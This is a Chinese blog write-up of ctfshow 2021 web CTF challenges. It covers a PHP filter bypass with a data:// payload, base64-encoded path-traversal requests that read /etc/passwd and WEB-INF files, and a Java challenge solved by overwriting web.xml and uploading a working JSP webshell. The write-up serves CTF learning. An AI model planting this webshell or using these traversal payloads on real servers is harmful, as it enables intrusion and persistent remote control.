[ctfshow 2021摆烂杯] WEB部分 writeup

最新推荐文章于 2024-04-27 02:17:40 发布
最新推荐文章于 2024-04-27 02:17:40 发布
阅读量1k 收藏
点赞数
分类专栏: ctf # web 文章标签: ctf web ctfshow php java
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/122301591
版权
ctf 同时被 2 个专栏收录
85 篇文章 10 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏

[ctfshow 2021摆烂杯] WEB部分 writeup

官方的wp:https://qgieod1s9b.feishu.cn/docs/doccnC4EpMhSv1Ni6mbL7BQQdBc


web签到

在这里插入图片描述
请输入三个整数A、B、C,使得:A³+B³+C³=114,目前是无解的
在这里插入图片描述

直接输入字母会报hacker,直接输数字0也不可以,但是在ABC中还可以用+-*/以及()进行计算(如果最后得到的不是正常的数字,会报500 Internal Server Error),所以利用()进行闭合,就可以得到114
在这里插入图片描述
在这里插入图片描述
A=1&B=-1&C=113)+(1 就可以啦

在这里插入图片描述

一行代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-11-18 21:25:22
# @Last Modified by:   h1xa
# @Last Modified time: 2021-11-18 22:14:12
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/



echo !(!(include "flag.php")||(!error_reporting(0))||stripos($_GET['filename'],'.')||($_GET['id']!=0)||
(strlen($_GET['content'])<=7)||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow"))||substr($_GET['content'],0,1)=='w'||
(file_get_contents($_GET['filename'],'r') !== "welcome2ctfshow"))?$flag:str_repeat(highlight_file(__FILE__), 0);

理一理代码,需要满足以下条件

stripos($_GET['filename'],'.')===False

$_GET['id']=0

strlen($_GET['content'])>7

eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow")
substr($_GET['content'],0,1)=='w'===False
//可以用通配符.或者*绕过

file_get_contents($_GET['filename'],'r') == "welcome2ctfshow"

payload

?filename=data://text/plain,welcome2ctfshow&id=0&content=.79595959595959gdfgfd

在这里插入图片描述

黑客网站

在这里插入图片描述


登陆不了

请添加图片描述漏洞居然是在验证码图片这里,我好傻
任意文件读取

/v/c?r=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==

在这里插入图片描述

1.读一些敏感文件

/v/c?r=Li4vLi4vLi4vV0VCLUlORi93ZWIueG1s 
../../../WEB-INF/web.xml

image-20220124100119383

<?xml version="1.0" encoding="UTF-8"?>
<web-app version="3.0" 
    xmlns="http://java.sun.com/xml/ns/javaee" 
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
    xsi:schemaLocation="http://java.sun.com/xml/ns/javaee 
    http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
  <display-name></display-name>
    <filter>
        <filter-name>routerFilter</filter-name>
        <filter-class>com.ctfshow.filter.impl.RouterFilterImpl</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>routerFilter</filter-name>
        <url-pattern>/404.html</url-pattern>
        <url-pattern>/*</url-pattern>
        <dispatcher>REQUEST</dispatcher>
    </filter-mapping>
    <error-page>
        <error-code>404</error-code>
        <location>/404.html</location>
    </error-page>
    <error-page>
        <error-code>500</error-code>
        <location>/404.html</location>
    </error-page>
    <session-config>
        <cookie-config>
            <name>ctfshow</name>
            <http-only>true</http-only>
        </cookie-config>
        <tracking-mode>COOKIE</tracking-mode>
    </session-config>
    <error-page>
        <error-code>400</error-code>
        <location>/404.html</location>
    </error-page>
</web-app>

…/…/…/WEB-INF/pom.xml

<project xmlns="http://maven.apache.org/POM/4.0.0" 
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 
   http://maven.apache.org/maven-v4_0_0.xsd">
   <modelVersion>4.0.0</modelVersion>
   <groupId>com.ctfshow</groupId>
   <artifactId>FlagShop</artifactId>
   <packaging>jar</packaging>
   <version>1.0-SNAPSHOT</version>
   <name>FlagShop</name>
   <url>http://maven.apache.org</url>
 
   <dependencies>

 
      <dependency>
         <groupId>ctfshow</groupId>
         <artifactId>tiny-framework</artifactId>
         <scope>system</scope>
         <version>1.1</version>
         <systemPath>${basedir}\lib\tiny-framework-1.0.1.jar</systemPath>
      </dependency>
   </dependencies>
 
</project>

发现框架${basedir}\lib\tiny-framework-1.0.1.jar,进行读取

/v/c?r=Li4vLi4vLi4vV0VCLUlORi9saWIvdGlueS1mcmFtZXdvcmstMS4wLjEuamFy

注意下载下来的jar文件末尾有多余的0,清理至下图

image-20220124112917734

反编译并审计找到路由配置,再把这里的控制器/…/config/controller.properties读一下

image-20220124140350189

/v/c?r=Li4vLi4vLi4vV0VCLUlORi9jb25maWcvY29udHJvbGxlci5wcm9wZXJ0aWVz

这个应该是index的控制器

image-20220124140350189
下载index的控制器classes/com/ctfshow/controller/Index.class

/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中

/v/c?r=Li4vLi4vLi4vV0VCLUlORi9jbGFzc2VzL2NvbS9jdGZzaG93L2NvbnRyb2xsZXIvSW5kZXguY2xhc3M=

image-20220124141331000

反编译发现有任意文件写入的漏洞

FileUtil.writeFile(String.valueOf(this.request.server().path()) + "../" + username, password);

由于文件名限制为字母数字和.,所以并不能跨目录写文件,只能写到classes目录下

2.利用web.xml写jsp🐎

利用tomcat的热加载机制,重写web.xml,再写个对应的jsp马,写反弹shell即可

username=web.xml&password=<?xml version="1.0" encoding="UTF-8"?>
<web-app version="3.0" 
        xmlns="http://java.sun.com/xml/ns/javaee" 
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
        xsi:schemaLocation="http://java.sun.com/xml/ns/javaee 
        http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
  <display-name></display-name>
    <filter>
        <filter-name>routerFilter</filter-name>
        <filter-class>com.ctfshow.filter.impl.RouterFilterImpl</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>routerFilter</filter-name>
        <url-pattern>/404.html</url-pattern>
        <url-pattern>/s/*</url-pattern>
        <dispatcher>REQUEST</dispatcher>
    </filter-mapping>
<servlet>  
<servlet-name>ctfshow</servlet-name>  //新增一个servlet来映射到WEB-INF下的jsp文件
<jsp-file>/WEB-INF/1.jsp</jsp-file>  //路径ctfshow访问当前目录下的1.jsp
</servlet>  
<servlet-mapping>  
<servlet-name>ctfshow</servlet-name>  
<url-pattern>/ctfshow</url-pattern>  
</servlet-mapping>  </web-app>

然后上传一个jsp木马(密码passwd)

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

注意要url编码,因为有换行

image-20220124145316786

image-20220124145356186

蚁剑连接,得到flag
image-20220124145356186

shu天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow-Web入门writeup
m0_61596829的博客
06-08 591
CTFshow-Web入门writeup
ctfshow 摆烂杯web wp
Lum1n0us's Blog
12-27 3251
考试前不想复(预)习,正好是ctfshow的摆烂杯,就去做了几道web题 文章目录web签到黑客网站一行代码 web签到 题目要输入三个整数A、B、C,ABC均不可为0,让A³+B³+C³=114,刚开始还想着爆破,后面感觉到太慢了,开始随便输,发现输入1+1后会把他当成2来计算,那就很好办了,直接让输入数的幂为1/3即可 A=5&B=-1&C=-10**(1/3) 后面看群才知道。。 幸亏没爆破 黑客网站 f12后发现一堆字符串,题目也说了不用渗透和扫描,说明关键点就是这些字符串,.
[CTF]CTFSHOW摆烂杯 WEB WP
Sapphire037的博客
12-26 2314
一行代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2021-11-18 21:25:22 # @Last Modified by: h1xa # @Last Modified time: 2021-11-18 22:14:12 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ echo !(!(include "flag.php")||(!error_
ISG 2018 Web Writeup
dfdhxb995397的博客
09-06 250
作者:agetflag 原文来自:ISG 2018 Web Writeup ISG 2018 Web Writeup CTF萌新,所以写的比较基础,请大佬们勿喷,比赛本身的Web题也不难 calc 首先看到题目后,在输入框中测试了一下,发现可以被执行 首先猜想是不是ssti,模板注入,但是平常遇到的模板注入题目中,python的居多,php的没怎么遇到过,有点怀疑如果是p...
CTFSHOW-WEB入门 writeup
abtgu的博客
09-29 1820
web1 题目: 开发注释未及时删除 解题思路: 右键查看源代码即可得到flag。 web2 题目: js前台拦截 === 无效操作 解题思路: 火狐浏览器禁止JavaScript之后,右键查看源代码,得到flag。 web3 题目: 没思路的时候抓个包看看,可能会有意外收获 解题思路: burp抓包,查看响应头,得到flag。 web4 题目: 解题思路: 根据提示访问http://a03708c9-ff09-457d-9688-676ccb7997ce.chall.ctf.show/robots.txt
[2021东华杯]Web Writeup1
08-03
Java 反序列化漏洞及利用 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,发生在 Java 对象的序列化和反序列化过程中。该漏洞可以导致攻击者执行恶意代码,盗取敏感信息,或者控制服务器。 ...
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
2020YCBCTF羊城杯官方Writeup.pdf
10-28
2020YCBCTF羊城杯官方Writeup.pdf
2023 强网杯 Writeup
01-29
2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析和知识点总结...
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
web渗透writeup
09-11
根据源码可以看到两处特别需要重视的地方,我已标红,很明显该sql语句存在注入漏洞,但是密码栏不能通过一般的注入来绕过,但是可以发现,只要满足了($row[pw]) && (!strcasecmp($pass, $row[pw])就可以拿到flag,也就是说,我们输入的$pass与从数据库取出来的pw一致就行,我们可以控制$pass的值,但是貌似不知道数据库中pw的值,但是我们可以直接用union select ‘某一个经过md5加密后的字符串’#来自己随意设定密码,注意这里一定是经过md5加密,不然会出错。 构造语句:’ and 0=1 union select ‘529CA8050A00180790CF88B63468826A’# 密码:hehe 就拿到flag了。
ctfshow web入门 writeup 1-20(信息收集)
qq_44893894的博客
10-31 1261
信息收集系列 web1 题目:开发注释未及时删除 根据题目意思查看网页源代码,发现flag web2 题目:js前台拦截 === 无效操作 打开页面->无法显示源代码->根据题目因为js前台拦截,右键,以及F12均无法查看源码 在url前加上view-source:,或者设置浏览器禁止JavaScript(我在chrome的设置中搜索JavaScript找到了,Firefox没找到),即可查看源码并得到flag web3 题目:没思路的时候抓个包看看,可能会有意外收获 根据题目提示用burpsu
CTFshow——web入门——反序列化web254-web278 详细Writeup
Leaf_initial的博客
08-24 2156
在做题之前先简要总结一下知识点。
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 596
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python脚
html ctf查找,CTFSHOW的web部分writeup
weixin_31655833的博客
06-17 283
WEB2题目提示是简单的SQL注入,于是尝试输入点中使用万能密码:admin‘or 1=1#(CTF中SQL万能密码集合)发现成功执行,于是order by查找回显数username=ctfshow‘ order by 3 #&password=1在3时正常回显,4是无回显,说明回显数为3使用union select 联合查询爆库名username=ctfshow‘ union selec...
CTFshow——web入门——爆破web21-web28 详细Writeup
Leaf_initial的博客
08-01 312
解释一下为什么每一次的mt_rand()+mt_rand()不是第一次的随机数相加,因为生成的随机数可以说是一个线性变换(实际上非常复杂),每一次是确定的但是并不一样,所以不能 进行第一次*2就得到mt_rand()+mt_rand(),所以说只要我们得到种子就可以在本地进行获得自己想要的值解题。的值,该值经过md5加密后要他的第1,14,17位的值都相等,并且第1,14,17,31的值是整数并且第1,14,17位的值相加之后除以第1位的值等于第31位的值。
CTF WebCTFShow web14 Writeup(PHP+switch case 穿透+SQL注入+文件读取)
最新发布
HEX9CF的技术博客
04-27 526
5。
ctfshow摆烂杯 比烂为主】
chuxuezhewocao的博客
06-02 949
ctfshow摆烂杯 比烂为主
[2021东华杯]Web Writeup
feng的博客
11-01 3594
EzGadget 给了源码,IDEA打开看看,有个反序列化的点: @ResponseBody @RequestMapping({"/readobject"}) public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception { byte[] b = Tools.base64Decode(data); I
"2021东华杯Web Writeup1:EzGadget反序列化漏洞分析
2021年东华杯Web Writeup1比赛中,EzGadget提供了源码并打开了IDEA进行分析。在源码中发现了一个反序列化的漏洞点:在ToStringBean这个类的unser方法中,通过"/readobject"接口接收data参数并进行反序列化操作。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值